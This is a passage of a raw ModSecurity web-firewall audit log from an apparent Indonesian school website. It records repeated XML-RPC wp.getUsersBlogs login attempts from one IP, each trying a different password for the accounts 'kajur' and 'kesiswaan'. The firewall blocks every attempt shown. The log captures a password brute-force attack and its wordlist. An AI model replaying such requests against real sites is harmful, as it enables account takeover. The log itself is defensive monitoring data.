118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 216 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --b2244120-C-- wp.getUsersBlogs kajur qwewq --b2244120-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b2244120-E-- --b2244120-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (79+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749868764453337 4774 (- - -) Stopwatch2: 1749868764453337 4774; combined=3491, p1=357, p2=2944, p3=0, p4=0, p5=108, sr=78, sw=82, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b2244120-Z-- --9d00402c-A-- [14/Jun/2025:09:39:54 +0700] aEzg-mmwZ6YUkjOdtI7K3gAAAA0 103.236.140.4 41342 103.236.140.4 8181 --9d00402c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --9d00402c-C-- wp.getUsersBlogs kajur 1234%^&* --9d00402c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9d00402c-E-- --9d00402c-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749868794940340 3854 (- - -) Stopwatch2: 1749868794940340 3854; combined=2870, p1=302, p2=2422, p3=0, p4=0, p5=87, sr=66, sw=59, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9d00402c-Z-- --5eec5f32-A-- [14/Jun/2025:09:40:29 +0700] aEzhHWIDXuKmWNi2UBS3mQAAAEY 103.236.140.4 41374 103.236.140.4 8181 --5eec5f32-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --5eec5f32-C-- wp.getUsersBlogs kajur 1a2s3d4f --5eec5f32-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5eec5f32-E-- --5eec5f32-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (44+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749868829575333 5526 (- - -) Stopwatch2: 1749868829575333 5526; combined=3836, p1=454, p2=3226, p3=0, p4=0, p5=91, sr=87, sw=65, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5eec5f32-Z-- --4afcf874-A-- [14/Jun/2025:09:41:29 +0700] aEzhWWmwZ6YUkjOdtI7LNAAAAAQ 103.236.140.4 41582 103.236.140.4 8181 --4afcf874-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --4afcf874-C-- wp.getUsersBlogs kajur basketball --4afcf874-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4afcf874-E-- --4afcf874-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (97+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749868889122275 4444 (- - -) Stopwatch2: 1749868889122275 4444; combined=3516, p1=322, p2=3011, p3=0, p4=0, p5=105, sr=74, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4afcf874-Z-- --5c891352-A-- [14/Jun/2025:09:42:38 +0700] aEzhnl3g_boun6Rx5jLS7QAAANY 103.236.140.4 41708 103.236.140.4 8181 --5c891352-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --5c891352-C-- wp.getUsersBlogs kajur qwerty1 --5c891352-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5c891352-E-- --5c891352-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (58+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749868958859801 5062 (- - -) Stopwatch2: 1749868958859801 5062; combined=3732, p1=444, p2=3119, p3=0, p4=0, p5=99, sr=77, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5c891352-Z-- --ba98100f-A-- [14/Jun/2025:09:43:38 +0700] aEzh2mmwZ6YUkjOdtI7LfgAAAAg 103.236.140.4 41890 103.236.140.4 8181 --ba98100f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --ba98100f-C-- wp.getUsersBlogs kajur asshole --ba98100f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ba98100f-E-- --ba98100f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (89+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749869018218182 4108 (- - -) Stopwatch2: 1749869018218182 4108; combined=3187, p1=376, p2=2647, p3=0, p4=0, p5=95, sr=79, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ba98100f-Z-- --8666136e-A-- [14/Jun/2025:09:44:38 +0700] aEziFmIDXuKmWNi2UBS3qwAAAEI 103.236.140.4 42166 103.236.140.4 8181 --8666136e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --8666136e-C-- wp.getUsersBlogs kajur target123 --8666136e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8666136e-E-- --8666136e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (116+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749869078262230 4591 (- - -) Stopwatch2: 1749869078262230 4591; combined=3358, p1=343, p2=2822, p3=0, p4=0, p5=110, sr=80, sw=83, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8666136e-Z-- --c7bdc84b-A-- [14/Jun/2025:09:45:38 +0700] aEziUmIDXuKmWNi2UBS4AQAAAFI 103.236.140.4 42354 103.236.140.4 8181 --c7bdc84b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 228 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c7bdc84b-C-- wp.getUsersBlogs kesiswaan kesiswaan1981 --c7bdc84b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c7bdc84b-E-- --c7bdc84b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (92+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749869138048200 4209 (- - -) Stopwatch2: 1749869138048200 4209; combined=3236, p1=387, p2=2683, p3=0, p4=0, p5=96, sr=80, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c7bdc84b-Z-- --e2596f49-A-- [14/Jun/2025:09:46:40 +0700] aEzikGmwZ6YUkjOdtI7MHQAAAAI 103.236.140.4 42510 103.236.140.4 8181 --e2596f49-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 229 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --e2596f49-C-- wp.getUsersBlogs kesiswaan Marketing2017_ --e2596f49-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e2596f49-E-- --e2596f49-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (75+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749869200603816 4675 (- - -) Stopwatch2: 1749869200603816 4675; combined=3407, p1=370, p2=2849, p3=0, p4=0, p5=107, sr=81, sw=81, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e2596f49-Z-- --65961518-A-- [14/Jun/2025:09:47:42 +0700] aEzizmmwZ6YUkjOdtI7MPgAAABE 103.236.140.4 42592 103.236.140.4 8181 --65961518-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 229 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --65961518-C-- wp.getUsersBlogs kesiswaan marketing2014_ --65961518-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --65961518-E-- --65961518-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (34+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749869262420941 5016 (- - -) Stopwatch2: 1749869262420941 5016; combined=3792, p1=429, p2=3179, p3=0, p4=0, p5=106, sr=81, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --65961518-Z-- --d0af552f-A-- [14/Jun/2025:09:48:42 +0700] aEzjCmmwZ6YUkjOdtI7MWQAAABM 103.236.140.4 42668 103.236.140.4 8181 --d0af552f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 228 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d0af552f-C-- wp.getUsersBlogs kesiswaan marketing2018 --d0af552f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d0af552f-E-- --d0af552f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (32+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749869322749510 4333 (- - -) Stopwatch2: 1749869322749510 4333; combined=3327, p1=355, p2=2803, p3=0, p4=0, p5=98, sr=78, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d0af552f-Z-- --bac5ef48-A-- [14/Jun/2025:09:49:42 +0700] aEzjRmmwZ6YUkjOdtI7MnAAAABE 103.236.140.4 42816 103.236.140.4 8181 --bac5ef48-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --bac5ef48-C-- wp.getUsersBlogs kesiswaan Loginadmin --bac5ef48-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bac5ef48-E-- --bac5ef48-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (70+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749869382242052 4267 (- - -) Stopwatch2: 1749869382242052 4267; combined=3296, p1=374, p2=2754, p3=0, p4=0, p5=98, sr=109, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bac5ef48-Z-- --05267617-A-- [14/Jun/2025:09:50:57 +0700] aEzjkWIDXuKmWNi2UBS4JQAAAEk 103.236.140.4 42916 103.236.140.4 8181 --05267617-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --05267617-C-- wp.getUsersBlogs kesiswaan 123456abc --05267617-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --05267617-E-- --05267617-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (46+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749869457436948 6184 (- - -) Stopwatch2: 1749869457436948 6184; combined=4261, p1=560, p2=3524, p3=0, p4=0, p5=105, sr=104, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --05267617-Z-- --531cde77-A-- [14/Jun/2025:09:52:02 +0700] aEzj0kMWfhkd5Y0sFtrsRQAAAJA 103.236.140.4 43046 103.236.140.4 8181 --531cde77-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --531cde77-C-- wp.getUsersBlogs kesiswaan myp@ss --531cde77-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --531cde77-E-- --531cde77-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (63+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749869522631764 5412 (- - -) Stopwatch2: 1749869522631764 5412; combined=3860, p1=489, p2=3199, p3=0, p4=0, p5=101, sr=92, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --531cde77-Z-- --c2490c65-A-- [14/Jun/2025:09:53:05 +0700] aEzkEUMWfhkd5Y0sFtrsWAAAAI4 103.236.140.4 43178 103.236.140.4 8181 --c2490c65-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 229 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c2490c65-C-- wp.getUsersBlogs kesiswaan admin123456789 --c2490c65-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c2490c65-E-- --c2490c65-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (61+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749869585246580 5375 (- - -) Stopwatch2: 1749869585246580 5375; combined=3852, p1=465, p2=3144, p3=0, p4=0, p5=141, sr=89, sw=102, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c2490c65-Z-- --4e9fad01-A-- [14/Jun/2025:09:54:05 +0700] aEzkTWmwZ6YUkjOdtI7M1QAAABg 103.236.140.4 43286 103.236.140.4 8181 --4e9fad01-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --4e9fad01-C-- wp.getUsersBlogs kesiswaan mypc123 --4e9fad01-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4e9fad01-E-- --4e9fad01-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (44+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749869645044965 4571 (- - -) Stopwatch2: 1749869645044965 4571; combined=3510, p1=402, p2=2884, p3=0, p4=0, p5=132, sr=79, 